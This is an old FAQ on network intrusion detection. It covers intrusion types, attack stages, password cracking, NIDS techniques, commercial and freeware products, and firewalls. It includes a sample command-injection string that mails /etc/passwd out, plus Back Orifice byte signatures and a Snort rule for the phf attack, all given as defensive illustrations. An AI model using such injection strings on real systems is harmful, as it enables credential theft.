This FAQ answers simple questions related to detecting intruders who attack systems through the network, especially how such intrusions can be detected. Questions? Feedback? Send mail to nids-faq @ robertgraham.com
Copyright 1998-2000 by Robert Graham (mailto:nids-faq1@RobertGraham.com. All rights reserved. This document may be reproduced only for non-commercial purposes. All reproductions must contain this exact copyright notice. Reproductions must not contain alterations except by permision.
Olaf Schreck <chakl at syscall de>
John Kozubik <john_kozubik
at hotmail com> (see http://www.networkcommand.com/john/index.html for NT
login-script tips).
Aaron Bawcom <abawcom at pacbell net>
Mike
Kienenberger <mkienenb at arsc edu>
Keiji Takeda <keiji at sfc
keio ac jp>
Scott Hamilton <sah at uow edu au>
Holger Heimann
<hh at it-sec de>
Bennett Todd <bet at mordor dot net>
An intrusion is somebody (A.K.A. "hacker" or "cracker") attempting to break into or misuse your system. The word "misuse" is broad, and can reflect something severe as stealing confidential data to something minor such as misusing your email system for spam (though for many of us, that is a major issue!).
An "Intrusion Detection System (IDS)" is a system for detecting such intrusions. For the purposes of this FAQ, IDS can be broken down into the following categories:
network intrusion detection systems (NIDS) monitors packets on the network wire and attempts to discover if a hacker/cracker is attempting to break into a system (or cause a denial of service attack). A typical example is a system that watches for large number of TCP connection requests (SYN) to many different ports on a target machine, thus discovering if someone is attempting a TCP port scan. A NIDS may run either on the target machine who watches its own traffic (usually integrated with the stack and services themselves), or on an independent machine promiscuously watching all network traffic (hub, router, probe). Note that a "network" IDS monitors many machines, whereas the others monitor only a single machine (the one they are installed on).
system integrity verifiers (SIV) monitors system files to find when a intruder changes them (thereby leaving behind a backdoor). The most famous of such systems is "Tripwire". A SIV may watch other components as well, such as the Windows registry and chron configuration, in order to find well known signatures. It may also detect when a normal user somehow acquires root/administrator level privleges. Many existing products in this area should be considered more "tools" than complete "systems": i.e. something like "Tripwire" detects changes in critical system components, but doesn't generate real-time alerts upon an intrusion.
log file monitors (LFM) monitor log files generated by network services. In a similar manner to NIDS, these systems look for patterns in the log files that suggest an intruder is attacking. A typical example would be a parser for HTTP server log files that looking for intruders who try well-known security holes, such as the "phf" attack. Example: swatch
deception systems (A.K.A. decoys, lures, fly-traps, honeypots) which contain pseudo-services whose goal is to emulate well-known holes in order to trap hackers. See The Deception ToolKit http://www.all.net/dtk/ for an example. Also, simple tricks by renaming "administrator" account on NT, then setting up a dummy account with no rights by extensive auditing can be used. There is more on "deception" later in this document. Also see http://www.enteract.com/~lspitz/honeypot.html
other
For more info, see http://www.icsa.net/idswhite/.
Intruders can be classified into two categories.
There are several types of intruders Joy riders hack because they can. Vandals are intent on causing destruction or marking up your web-pages. Profiteers are intent on profiting from their enterprise, such as rigging the system to give them money or by stealing corporate data and selling it.
Physical Intrusion If a intruders have physical access to a machine (i.e. they can use the keyboard or take apart the system), they will be able to get in. Techniques range from special privileges the console has, to the ability to physically take apart the system and remove the disk drive (and read/write it on another machine). Even BIOS protection is easy to bypass: virtually all BIOSes have backdoor passwords.
System Intrusion This type of hacking assumes the intruder already has a low-privilege user account on the system. If the system doesn't have the latest security patches, there is a good chance the intruder will be able to use a known exploit in order to gain additional administrative privileges.
Remote Intrusion This type of hacking involves a intruder who attempts to penetrate a system remotely across the network. The intruder begins with no special privileges. There are several forms of this hacking. For example, a intruder has a much more difficult time if there exists a firewall on between him/her and the victim machine.
Note that Network Intrusion Detection Systems are primarily concerned with Remote Intrusion.
Buffer overflows: Almost all the security holes you read about in the press are due to this problem. A typical example is a programmer who sets aside 256 characters to hold a login username. Surely, the programmer thinks, nobody will ever have a name longer than that. But a hacker thinks, what happens if I enter in a false username longer than that? Where do the additional characters go? If they hackers do the job just right, they can send 300 characters, including code that will be executed by the server, and voila, they've broken in. Hackers find these bugs in several ways. First of all, the source code for a lot of services is available on the net. Hackers routinely look through this code searching for programs that have buffer overflow problems. Secondly, hackers may look at the programs themselves to see if such a problem exists, though reading assembly output is really difficult. Thirdly, hackers will examine every place the program has input and try to overflow it with random data. If the program crashes, there is a good chance that carefully constructed input will allow the hacker to break in. Note that this problem is common in programs written in C/C++, but rare in programs written in Java.
Unexpected combinations: Programs are usually constructed using
many layers of code, including the underlying operating system as the bottom
most layer. Intruders can often send input that is meaningless to one layer,
but meaningful to another layer. The most common language for processing
user input on the web is PERL. Programs written in PERL will usually send
this input to other programs for further evaluation. A common hacking
technique would be to enter something like "| mail <
/etc/passwd
". This gets executed because PERL asks the operating
system to launch an additional program with that input. However, the
operating system intercepts the pipe '|' character and launches the 'mail'
program as well, which causes the password file to be emailed to the
intruder.
Unhandled input: Most programs are written to handle valid input. Most programmers do not consider what happens when somebody enters input that doesn't match the specification.
Race conditions: Most systems today are "multitasking/multithreaded". This means that they can execute more than one program at a time. There is a danger if two programs need to access the same data at the same time. Imagine two programs, A and B, who need to modify the same file. In order to modify a file, each program must first read the file into memory, change the contents in memory, then copy the memory back out into the file. The race condition occurs when program A reads the file into memory, then makes the change. However, before A gets to write the file, program B steps in and does the full read/modify/write on the file. Now program A writes its copy back out to the file. Since program A started with a copy before B made its changes, all of B's changes will be lost. Since you need to get the sequence of events in just the right order, race conditions are very rare. Intruders usually have to tries thousands of time before they get it right, and hack into the system.
Default configurations: Most systems are shipped to customers with default, easy-to-use configurations. Unfortunately, "easy-to-use" means "easy-to-break-in". Almost any UNIX or WinNT machine shipped to you can be hacked in easily.
Lazy administrators: A surprising number of machines are configured with an empty root/administrator password. This is because the administrator is too lazy to configure one right now and wants to get the machine up and running quickly with minimal fuss. Unfortunately, they never get around to fixing the password later, allowing intruders easy access. One of the first things a intruder will do on a network is to scan all machines for empty passwords.
Hole creation: Virtually all programs can be configured to run in a non-secure mode. Sometimes administrators will inadvertently open a hole on a machine. Most administration guides will suggest that administrators turn off everything that doesn't absolutely positively need to run on a machine in order to avoid accidental holes. Note that security auditing packages can usually find these holes and notify the administrator.
Trust relationships: Intruders often "island hop" through the network exploiting trust relationships. A network of machines trusting each other is only as secure as its weakest link.
Really weak passwords: Most people use the names of themselves, their children, spouse/SO, pet, or car model as their password. Then there are the users who choose "password" or simply nothing. This gives a list of less than 30 possibilities that a intruder can type in for themselves.
Dictionary attacks: Failing the above attack, the intruder can next try a "dictionary attack". In this attack, the intruder will use a program that will try every possible word in the dictionary. Dictionary attacks can be done either by repeatedly logging into systems, or by collecting encrypted passwords and attempting to find a match by similarly encrypting all the passwords in the dictionary. Intruders usually have a copy of the English dictionary as well as foreign language dictionaries for this purpose. They all use additional dictionary-like databases, such as names (see above) and lists of common passwords.
Brute force attacks: Similar to a Dictionary attack, a intruder may try all possible combinations of characters. A short 4-letter password consisting of lower-case letters can be cracked in just a few minutes (roughly, half a million possible combinations). A long 7-character password consisting of upper and lower case, as well as numbers and punctuation (10 trillion combinations) can take months to crack assuming you can try a million combinations a second (in practice, a thousand combinations per second is more likely for a single machine).
Shared medium: On traditional Ethernet, all you have to do is put a Sniffer on the wire to see all the traffic on a segment. This is getting more difficult now that most corporations are transitioning to switched Ethernet.
Server sniffing: However, on switched networks, if you can install a sniffing program on a server (especially one acting as a router), you can probably use that information to break into client machines and trusted machines as well. For example, you might not know a user's password, but sniffing a Telnet session when they log in will give you that password.
Remote sniffing: A large number of boxes come with RMON enabled and public community strings. While the bandwidth is really low (you can't sniff all the traffic), it presents interesting possibilities.
TCP/IP protocol flaws: The TCP/IP protocool was designed before we had much experience with the wide-scale hacking we see today. As a result, there are a number of design flaws that lead to possible security problems. Some examples include smurf attacks, ICMP Unreachable disconnects, IP spoofing, and SYN floods. The biggest problem is that the IP protocol itself is very "trusting": hackers are free to forge and change IP data with impunity. IPsec (IP security) has been designed to overcome many of these flaws, but it is not yet widely used.
UNIX design flaws: There are number of inherent flaws in the UNIX operating system that frequently lead to intrusions. The chief problem is the access control system, where only 'root' is granted administrative rights. As a result,
Clear-text sniffing: A number of protocols (Telnet, FTP, HTTP Basic) use clear-text passwords, meaning that they are not encrypted as the go over the wire between the client and the server. A intruder with a protocol analyzer can watch the wire looking for such passwords. No further effort is needed; the intruder can start immediately using those passwords to log in.
Encrypted sniffing: Most protocols, however, use some sort of encryption on the passwords. In these cases, the intruder will need to carry out a Dictionary or Brute Force attack on the password in order to attempt decryption. Note that you still don't know about the intruder's presence, as he/she has been completely passive and has not transmitted anything on the wire. Password cracking does not require anything to be sent on the wire as intruder's own machine is being used to authenticate your password.
Replay attack: In some cases, intruders do not need to decrypt the password. They can use the encrypted form instead in order to login to systems. This usually requires reprogramming their client software in order to make use of the encrypted password.
Password file stealing: The entire user database is usually stored
in a single file on the disk. In UNIX, this file is /etc/passwd
(or some mirror of that file), and under WinNT, this is the SAM file. Either
way, once a intruder gets hold of this file, he/she can run cracking programs
(described above) in order to find some weak passwords within the file.
Observation: One of the traditional problems in password security is that passwords must be long and difficult to guess (in order to make Dictionary and Brute Force cracks unreasonably difficult). However, such passwords are often difficult to remember, so users write them down somewhere. Intruders can often search a persons work site in order to find passwords written on little pieces of paper (usually under the keyboard). Intruders can also train themselves to watch typed in passwords behind a user's back.
Social Engineering: A common (successful) technique is to simply call the user and say "Hi, this is Bob from MIS. We're trying to track down some problems on the network and they appear to be coming from your machine. What password are you using?" Many users will give up their password in this situation. (Most corporations have a policy where they tell users to never give out their password, even to their own MIS departments, but this technique is still successful. One easy way around this is for MIS to call the new employee 6-months have being hired and ask for their password, then criticize them for giving it to them in a manner they will not forget :-)
A typical scenario might be:
Step 1: outside reconnaissance The intruder will find out as much as
possible without actually giving themselves away. They will do this by finding
public information or appearing as a normal user. In this stage, you really
can't detect them. The intruder will do a 'whois' lookup to find as much
information as possible about your network as registered along with your
Domain Name (such as foobar.com
. The intruder might walk through
your DNS tables (using 'nslookup', 'dig', or other utilities to do domain
transfers) to find the names of your machines. The intruder will browse other
public information, such as your public web sites and anonymous FTP sites. The
intruder might search news articles and press releases about your company.
Step 2: inside reconnaisance The intruder uses more invasive techniques to scan for information, but still doesn't do anything harmful. They might walk through all your web pages and look for CGI scripts (CGI scripts are often easily hacked). They might do a 'ping' sweep in order to see which machines are alive. They might do a UDP/TCP scan/strobe on target machines in order to see what services are available. They'll run utilities like 'rcpinfo', 'showmount', 'snmpwalk', etc. in order to see what's available. At this point, the intruder has done 'normal' activity on the network and has not done anything that can be classified as an intrusion. At this point, a NIDS will be able to tell you that "somebody is checking door handles", but nobody has actually tried to open a door yet.
Step 3: exploit The intruder crosses the line and starts exploiting possible holes in the target machines. The intruder may attempt to compromise a CGI script by sending shell commands in input fields. The intruder might attempt to exploit well-known buffer-overrun holes by sending large amounts of data. The intruder may start checking for login accounts with easily guessable (or empty) passwords. The hacker may go through several stages of exploits. For example, if the hacker was able to access a user account, they will now attempt further exploits in order to get root/admin access.
Step 4: foot hold At this stage, the hacker has successfully gained a foot hold in your network by hacking into a machine. The intruder's main goal is to hide evidence of the attacks (doctoring the audit trail and log files) and make sure they can get back in again. They may install 'toolkits' that give them access, replace existing services with their own Trojan horses that have backdoor passwords, or create their own user accounts. System Integrity Verifiers (SIVs) can often detect an intruder at this point by noting the changed system files. The hacker will then use the system as a stepping stone to other systems, since most networks have fewer defenses from inside attacks.
Step 5: profit The intruder takes advantage of their status to steal confidential data, misuse system resources (i.e. stage attacks at other sites from your site), or deface web pages.
Another scenario starts differently. Rather than attack a specific site, and intruder might simply scan random internet addresses looking for a specific hole. For example, an intruder may attempt to scan the entire Internet for machines that have the SendMail DEBUG hole. They simply exploit such machines that they find. They don't target you directly, and they really won't even know who you are. (This is known as a 'birthday attack'; given a list of well-known security holes and a list of IP addresses, there is a good chance that there exists some machine somewhere that has one of those holes).
reconnaisance These include ping sweeps, DNS zone transfers, e-mail recons, TCP or UDP port scans, and possibly indexing of public web servers to find cgi holes.
exploits Intruders will take advantage of hidden features or bugs to gain access to the system.
denial-of-service (DoS) attacks Where the intruder attempts to crash a service (or the machine), overload network links, overloaded the CPU, or fill up the disk. The intruder is not trying to gain information, but to simply act as a vandal to prevent you from making use of your machine.
Web server often have bugs related to their interaction with the underlying operating system. An old hole in Microsoft IIS have been dealing with the fact that files have two names, a long filename and a short 8.3 hashed equivalent that could sometimes be accessed bypassing permissions. NTFS (the new file system) has a feature called "alternate data streams" that is similar to the Macintosh data and resource forks. You could access the file through its stream name by appending "::$DATA" in order to see a script rather than run it.
Servers have long had problems with URLs. For example, the "death by a thousand slashes" problem in older Apache would cause huge CPU loads as it tried to process each directory in a thousand slash URL.
URL fields can cause a buffer overflow condition, either as it is parsed in the HTTP header, as it is displayed on the screen, or processed in some form (such as saved in the cache history). Also, an old bug with Internet Explorer allowed interaction with a bug whereby the browser would execute .LNK or .URL commands.
HTTP headers can be used to exploit bugs because some fields are passed to functions that expect only certain information.
HTML can be often exploited, such as the MIME-type overflow in Netscape Communicator's <EMBED> command.
JavaScript is a perennial favorite, and usually tries to exploit the "file upload" function by generating a filename and automatically hidden the "SUBMIT" button. There have been many variations of this bug fixed, then new ways found to circumvent the fixes.
Frames are often used as part of a JavaScript or Java hack (for example, hiding web-pages in 1px by 1px sized screens), but they present special problems. For example, I can include a link to a trustworthy site that uses frames, then replace some of those frames with web pages from my own site, and they will appear to you to be part of that remote site.
Java has a robust security model, but that model has proven to have the occasional bug (though compared to everything else, it has proven to be one of the most secure elements of the whole system). Moreover, its robust security may be its undoing: Normal Java applets have no access to the local system, but sometimes they would be more useful if they did have local access. Thus, the implementation of "trust" models that can more easily be hacked.
ActiveX is even more dangerous than Java as it works purely from a trust model and runs native code. You can even inadvertently catch a virus that was accidentally imbedded in some vendor's code.
IP spoofing is frequently used as part of other attacks:
More importantly, there is the issue of legal liability. You are potentially liable for damages caused by a hacker using your machine. You must be able to prove to a court that you took "reasonable" measures to defend yourself from hackers. For example, consider if you put a machine on a fast link (cable modem or DSL) and left administrator/root accounts open with no password. Then if a hacker breaks into that machine, then uses that machine to break into a bank, you may be held liable because you did not take the most obvious measures in securing the machine.
There is a good paper http://www.cert.org/research/JHThesis/Start.html by John D. Howard that discusses how much hacking goes on over the Internet, and how much danger you are in.
The NIPC was set up by the FBI in mid 1998, and its first major activity was to help track down the source of the Melissa virus (W97M.Melissa). The CyberNotes archive goes back to January 1999.
The benefit of this approach is that it can detect the anomalies without having to understand the underlying cause behind the anomalies.
For example, let's say that you monitor the traffic from individual workstations. Then, the system notes that at 2am, a lot of these workstations start logging into the servers and carrying out tasks. This is something interesting to note and possibly take action on.
This can be as simple as a pattern match. The classic example is to example every packet on the wire for the pattern "/cgi-bin/phf?", which might indicate somebody attempting to access this vulnerable CGI script on a web-server. Some IDS systems are built from large databases that contain hundreds (or thousands) of such strings. They just plug into the wire and trigger on every packet they see that contains one of these strings.
Traffic consists of IP datagrams flowing across a network. A NIDS is able to capture those packets as they flow by on the wire. A NIDS consists of a special TCP/IP stack that reassembles IP datagrams and TCP streams. It then applies some of the following techniques:
Protocol stack verification A number of intrusions, such as "Ping-O-Death" and "TCP Stealth Scanning" use violations of the underlying IP, TCP, UDP, and ICMP protocols in order to attack the machine. A simple verification system can flag invalid packets. This can include valid, by suspicious, behavior such as severally fragmented IP packets.
Application protocol verification A number of intrusions use invalid protocol behavior, such as "WinNuke", which uses invalid NetBIOS protocol (adding OOB data) or DNS cache poisoning, which has a valid, but unusually signature. In order to effectively detect these intrusions, a NIDS must re-implement a wide variety of application-layer protocols in order to detect suspicious or invalid behavior.
Creating new loggable events A NIDS can be used to extend the auditing capabilities of your network management software. For example, a NIDS can simply log all the application layer protocols used on a machine. Downstream event log systems (WinNT Event, UNIX syslog, SNMP TRAPS, etc.) can then correlate these extended events with other events on the network.
An example would be to do a traceroute against the victim. This will often generate a low-level event in the IDS. Traceroutes are harmless and frequent on the net, so they don't indicate an attack. However, since many attacks are preceded by traceroutes, IDSs will log them anyway. As part of the logging system, it will usually do a reverse-DNS lookup. Therefore, if you run your own DNS server, then you can detect when somebody is doing a reverse-DNS lookup on your IP address in response to your traceroute.
%systemroot%/system32
directory.
Also consider physical intrusion prevention network wide. John Kozubik suggests using login scripts to force the built-in password protected screen-saver. In the login script, include the line like:
regedit /s \\MY_PDC\netlogon\scrn.regAnd in the file "scrn.reg", put the text:
REGEDIT4 [HKEY_CURRENT_USER\Control Panel\Desktop] "ScreenSaveTimeOut"="1800" "ScreenSaveActive"="1" "SCRNSAVE.EXE"="c:\winnt\system32\logon.scr" "ScreenSaverIsSecure"="1"This will trigger the password prompt to appear 30-minutes after a user is away from the desktop (it doesn't log them out; just forces them to re-enter the password before they have access again).
The following are techniques for the typical user:
John Kozubik suggests the following techniques for corporate users (who presumably run login scripts from the servers). Since Win95/Win98 is so vulnerable, they provide easy penetration to the rest of the corporate environment. Win95 caches passwords in easy-to-read formats, so you want to remove them.
del c:\windows\*.pwl
REGEDIT /s \\MY_PDC\netlogon\nocache.regwhere "nocache.reg" consists of:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Network] "DisablePwdCaching"=dword:00000001
RedHat Case Study When I first created this FAQ, I was working on a RedHat 5 system. After installation, it lit up like an xmas tree when port scanned. For example, it installs a DNS service. RedHat versions 5.0-5.2 could be hacked via a buffer overflows in the default FTP, mountd, and DNS services. Similarly, RedHat version 6.0-6.1 could be hacked in the DNS and FTP services. The point is: even if you get the latest patched software, if you install the default services, your box can almost certainly be hacked.
I've been told about the http://www.bastille-linux.org/ script that will take a default RedHat 6.0/6.1 system and "harden" it. I also recommend installing IP chains to firewall your connection to the Internet. Finally, I recommend going through /etc/inetd.conf an removing all unnecessary services.
Beyond that, I know of nothing in particular.
First and foremost, create a security policy. Let's say that you are watching the network late in the evening and you see an intrusion in-progress. What do you do? Do you let the intrusion progress and collect evidence? Do you pull the plug? If so, do you pull the plug on the firewall between the intra- and extra- net? Or do you take down the entire Internet connection (preventing users from getting to you web site)? Who has the authority to pull the plug?
The priorities need to be set in place by the CEO of the corporation. Let's consider the scenario where you think you are being attacked, so you pull the plug. The users get up in arms, and complain. And, as it turns out, you were wrong, so your but gets fried. Even when blatant attacks are going on, few people pull the plug for fear of just such repercussions. Data theft is theoretical; ticked-off users are very real. Therefore, you need a policy from the very top that clearly states the importance of things and clearly lays out a procedure for what happens when an intrusion is suspected. [Author: does anybody have sample policies they can send me?]
Once you have the priorities straight, you need to figure out the technology. That's described in the next section.
For the most part, a good response requires that you've set up good defensive measures in the first place. These include:
Below is a log showing a telnet connection from a machine within your domain. The machine it connected to does not offer this service publicly so this can only be assumed to be an IP space probe for vulnerable machines. We take this matter seriously, and hope that you will as well. Please take action on this issue as is appropriate and respond to this address with your actions. Nov 6 07:13:13 pbreton in.telnetd[31565]: refused connect from xx.xx.xx.xxThis log entry was likely generated by tcpwrappers, a facility that enhances logging and access control to services on UNIX. It shows an unauthorized attempt from your site to the specified machine. As claimed in the e-mail message, it may be an automated sweep of some sort. The most popular protocols people sweep with are ICMP, FTP, SMTP, NNTP, and Telnet.
In any case, this is evidence of a probe, not an attack. Furthermore, there is no other corroborating evidence. As pointed out by Greg Drew <gdrew at computer dot org> there could be a number of benign reasons:
As it turns out, the incident was benign. The target network had reconfigured itself, and the "unauthorized" user didn't know about it yet, and wasn't logging in correctly.
As far as I can tell, the best technique is to collect as much information as you can. For example, I've put a packet sniffer capturing to tracefiles on our T-1 line saving to files on a 16-gigabyte disk (most any sniffing program on most platforms can do this). You may not think it fun, but I enjoy perusing these files. It's amazing how many TCP/UDP scans and other probes I see on a regular basis.
Likewise, you should make sure you have full auditing and logging enabled on any/all systems exposed to the Internet. These will help you figure out what happened when you were hacked.
See sections 4.4 and 4.5 below for a discussion of some freeware technologies.
Reviews can be found at:
Several of these have comments from the vendors themselves that they e-mailed me. Also note that this information can quickly become out of date. The industry has gone through several major changes since I started this document.
The site http://www.internations.net/uk/talisker/ has done a good job of wading through the marketing hype and pulling out the salient points about each of the commercial products.
BlackICE has multiple versions. The core is built around "BlackICE Sentry", a full network-based intrusion detection system. There are also host/hybrid versions that run on Windows desktops with a built-in personal firewall.The list of intrusions it detects is at: http://www.networkice.com/advICE/Intrusions
Distinguishing features of BlackICE Sentry are:
- Full 7-layer, stateful, protocol analysis
- Anti-evasion techniques (handles fragmentation, whisker scans, a whole suite of signature changing attacks)
- Extremely fast, easily handles full 100-mbps bandwidth.
Goto http://www.networkice.com/ for more information.
CyberCop Monitor is a hybrid host/network based IDS that analyzes network traffic to and from the host as well as Windows NT EventLog audit trails and Windows NT authentication activity.
- Developed under the Microsoft Management Console user interface, both CyberCop Monitor and the SMI Console integrate to provide an easy to use graphical interface for local / remote reporting, and remote installation.
- Configuration editor allows for custom settings and thresholds to suit every environment, including security profiles, account groups, time and subnets.
- Extensive filtering using ordered filter rules for each signature.
- Report coalescing feature suppresses denial of service on the IDS itself.
- Report collating of monitoring and scanning information per system with trend analysis options, including 3D charting and graphing from an SQL database.
Goto <http://www.nai.com/> for more information.
CyberCop Monitor was written from the ground up by NAI. There is NO connection with the CyberCop Network v.1.0 product developed by Network General/WheelGroup or the Haystack product from TIS - This was aging technology and shelved some months after each subsequent acquisition.
Internet Security Systems is the first and only company that has tied both intrusion detection (ISS RealSecure) and vulnerability detection (ISS Internet Scanner) into an integrated security platform for organization to help plan, analyze, and manage their security on a continuous basis. ISS RealSecure is a component of ISS SAFEsuite family of products that cover managing security risk across the enterprise. ISS RealSecure is the market-leader in Intrusion Detection with an integrated host and network based solution. ISS RealSecure comes with over 400 attack signatures with the ability for customers in both the network and host based solution to add or modify their own signatures.
Goto http://www.cai.com/solutions/enterprise/etrust/intrusion_detection.
Originally, SessionWall started out as more of a firewall/content-inspection platform that interposed itself in the stream of traffic. I'm not sure where it is now.
NFR is available in multiple forms: a freeware/research version (see below), the "NFR Intrusion Detection Appliance" which comes as bootable CD-ROM, and bundles from 3rd party resellers that add their own features on top of it (like Anzen).One of the popular features of NFR is "N-code", a fully featured programming language optimized for intrusion detection style capabilities. They have a fulll SMTP parser written in the N-code. Most other systems have either simply add signatures or force you to use raw C programming. Numerous N-code scripts are downloadable from the Internet from sources such as L0pht.
NFR does more statistical analysis than other systems. The N-code system allows easy additions into this generic statistical machine.
A general description can be found at http://www.nfr.net/forum/publications/LISA-97.htm
"Regexp" (regular expression) is a common pattern-matching language in the UNIX environment. While it has traditionally been used for searching text files, it can also be used for arbitrary binary data. In truth, such systems have more flexible matching criteria, such as finding ports or matching TCP flags.
"libpcap" (library for packet capture) is a common library available for UNIX systems that "sniffs" packets off a wire. Most UNIX-based intrusion detection systems (of any kind) use libpcap, though many also have optimized drivers for a small subset of platforms.
The source code for both modules is freely available. A large number of intrusion detection systems simply feed the output of libpcap (or tcpdump) into the regular expression parse, where the expressions come from a file on the disk. Some even simpler systems don't even use regular expressions and simply compare packets with well-known byte patterns. If you want to build a system like this yourself, read up on 'tcpdump' and regular expressions. To understand libpcap/tcpdump, the following document will be helpful: http://www.robertgraham.com/pubs/sniffing-faq.html.
This class of intrusion detection system has one advantage: it is the easiest to update. Products of this class will consistently have the largest number of "signatures" and be the fastest time-to-market for detecting new popular attack "scripts".
However, while such systems may bost the largest number of "signatures", they detect the fewest number of "serious" intrusions. For example, the 8 bytes "CE63D1D2 16E713CF" when seen at the start of UDP data indicates Back Orifice traffic with the default password. Even though 80% of Back Orifice attacks use the default password, the other 20% use different passwords and would not be detected by the system. For example, changing the Back Orifice password to "evade" would change the pattern to "8E42A52C 0666BC4A", and would go undetected by "network grep" systems.
Some of these systems do not reassemble IP datagrams or TCP streams. Again, a hacker could simply reconfigure the MTU size on the machine in order to evade regexp-pcap systems.
Such systems result in larger numbers of false positives. In the BackOrifice example above, the 64-bit pattern is not so uncommon that it won't be seen in other traffic. This will cause alarms to go off even when no Back Orifice is present.
Systems based upon protocol analysis do not have these problems. They catch all instances of the attack, not just the common varieties; they result in fewer false positives; and they often are able to run faster because a protocol decode doesn't have to "search" a frame. They are also able to more fully diagnose the problem; for example distinguish between a "Back Orifice PING" (which is harmless) and a "Back Orifice compromise" (which is an extreme condition). On the other hand, it can often take a week to add a new protocol analysis signature (rather than hours) due to the design and testing involved. Also, overly-agressive attempts to reduce false positives also leads to missing real attacks in some cases.
However, such systems have an advantage over protocol analysis systems. Because they do not have pre-conceived notion about what network traffic is supposed to look like, they can often detect attacks that other systems might miss. For example, if a company is running a POP3 server on a different port, it is likely that protocol analysis systems will not recognize the traffic as POP3. Therefore, any attacks against the port will go undetected. On the other hand, a network-grep style system doesn't necessarily care about port numbers and will check for the same signatures regardless of ports.
Snort has recently become very popular, and is considered really cool by a lot of people. It contains over 100 of its own signatures, and others can be found on the Internet.
Following is an example rule:
# here's an example of PHF attack detection where just a straight text string # is searched for in the app layer alert tcp any any -> 192.168.1.0/24 80 (msg:"PHF attempt"; content:"/cgi-bin/phf";)It says to alert an a TCP connection from any IP address and any port to the 192.168.1.x subnet to port 80. It searches for the content "/cgi-bin/phf" anywhere in the content. If it find such content, it will alert the console with a message "PHF attempt".
Usage of snort is usually done in the following manner:
Also, snort has a number of options to be used just to sniff network traffic.
Rules:
See ftp://coast.cs.purdue.edu/pub/tools/unix/argus for more info. Also see ftp://ftp.sei.cmu.edu/pub/argus-1.5
See above for info on the commercial version.
inetd
and services (like ftp, telnet, etc.). The inetd
will first
call tcpwrappers, which will do some authentication (by IP address) and
logging. Then, tcpwrappers will call the actual service, if need be.
For more details, contact AUSCERT directly on auscert@auscert.org.au.
Firewalls are simply a device that shuts off everything, then turns back on only a few well-chosen items. In a perfect world, systems would already be "locked down" and secure, and firewalls would be unneeded. The reason we have firewalls is precisely because security holes are left open accidentally.
Thus, when installing a firewall, the first thing it does is stops ALL communication. The firewall administrator then carefully adds "rules" that allow specific types of traffic to go through the firewall. For example, a typical corporate firewall allowing access to the Internet would stop all UDP and ICMP datagram traffic, stops incoming TCP connections, but allows outgoing TCP connections. This stops all incoming connections from Internet hackers, but still allows internal users to connect in the outgoing direction.
A firewall is simply a fence around you network, with a couple of well chosen gates. A fence has no capability of detecting somebody trying to break in (such as digging a hole underneath it), nor does a fence know if somebody coming through the gate is allowed in. It simply restricts access to the designated points.
In summary, a firewall is not the dynamic defensive system that users imagine it to be. In contrast, an IDS is much more of that dynamic system. An IDS does recognize attacks against the network that firewalls are unable to see.
For example, in April of 1999, many sites were hacked via a bug in ColdFusion. These sites all had firewalls that restricted access only to the web server at port 80. However, it was the web server that was hacked. Thus, the firewall provided no defense. On the other hand, an intrusion detection system would have discovered the attack, because it matched the signature configured in the system.
Another problem with firewalls is that they are only at the boundary to your network. Roughly 80% of all financial losses due to hacking come from inside the network. A firewall a the perimeter of the network sees nothing going on inside; it only sees that traffic which passes between the internal network and the Internet.
Some reasons for adding IDS to you firewall are:
"Defense in depth, and overkill paranoia, are your friends." (quote by Bennett Todd <bet at mordor dot net>). Hackers are much more capable than you think; the more defenses you have, the better. And they still won't protect you from the determined hacker. They will, however, raise the bar on determination needed by the hackers.
Consider bridge building throughout history. As time goes on, technology improves, and bridges are able to span ever larger distances (such as the Golden Gate bridge in SF, whose span is measured in kilometers). Bridge builders are very conservative due to the immense embarassment (not to mention loss of life) should the bridges fail. Therefore, they use much more material (wood, stone, steel) than they need, and they don't create spans nearly as long as they think they can. However, as time goes on, as bridges prove themselves, engineers take more and more risks, until a bridge fails. Then all the engineers become much more conservative again. As has been quoted "It's easy to build a bridge that doesn't fall down; what takes skill is building a bridge that just barely doesn't fall down."
In much the same way, most firewall administrators take the conservative approach. It is easy to build a firewall that can't be hacked by being overly conservative and paranoid, and simply turn off all but the absolutely necessary services.
However, in the real world, engineers are not allowed to be sufficiently paranoid. Just like bridge builders want to span ever wider rivers and gorges, corporations want to ever expand the services of the Internet. This puts immense pressure on firewall admins to relax the barriers. This process will continue up to the point where there system is hacked, at which point the corporation will become much more conservative. From this perspective, one could say that corporate dynamics are such that they will generally force the system to the point where it gets hacked.
As every firewall admin knows, the system is under constant attack from the Internet. Hackers from all over the world are constantly probing the system for weaknesses. Moreover, every few months a new security vulnerability is found in popular products, at which point the hackers simply scan the entire Internet looking for people with that hole, causing thousands of websites to be hacked. Such recent holes have been the ColdFusion cfmdocs bug and the Microsoft .htr buffer overflow.
There are a huge number of "script-kiddies" that are always running automated programs (like SATAN) on the Internet looking for holes. Without a firewall, these automated programs can detect and exploit holes literally in the blink of an eye. Even dial-up users who use the Internet only a few hours a week are getting scanned on a regular basis; high-profile corporate sites will be scanned by script-kiddies much more often.
Remember that firewalls are simple rule-based systems that allow/deny traffic going through them. Even "content inspection" style firewalls do not have the capability to clearly say whether the traffic constitues an attack; they only determine whether it matches their rules or not.
For example, a firewall in front of a web server might block all traffic except for TCP connections to port 80. As far as the firewall is concerned, any port-80 traffic is legitimate. An IDS, on the other hand, examines that same traffic and looks for pattern of attack. An IDS system doesn't really care if the manager decided to allow port 80 and deny the rest: as far as the IDS is concerned, all traffic is suspicious.
This means that an IDS must look at the same source of data as the firewall: namely, the raw network traffic on the wire. If an IDS sat "downstream" from the firewall isntead of side-by-side, it would be limitted to only those things the firewall considered attacks. In the above example, the firewall would never pass port 80 traffic to the IDS.
+-+ . |F| +-----+ . |I+--+IDS#1| . /============\ |R| +-----+ /============\ . H H |E| H corporate H . H internet H--------+--------+ +------+------H network H . H H | |W| | H +-----+ \============/ +--v--+ |A| +--v--+ \=========+IDS#4| |IDS#3| |L| |IDS#2| +-----+ +-----+ |L| +-----+ . +-+ .
Some common questions are:
The most important metric is packets/second. Marketing people use weasle words to say that their products can keep up with a full 100-mbps networks, but that is only under ideal conditions. A Network World did a review in August of 1998 where products failed at roughly 30% network load (50,000 pacets/second). Likewise, Network Computing did a review in September of 1999 with real-world traffic where several products that claimed 100-mbps could still not keep up.
The following questions are commonly asked, but are less likely to produce meaningful answers:
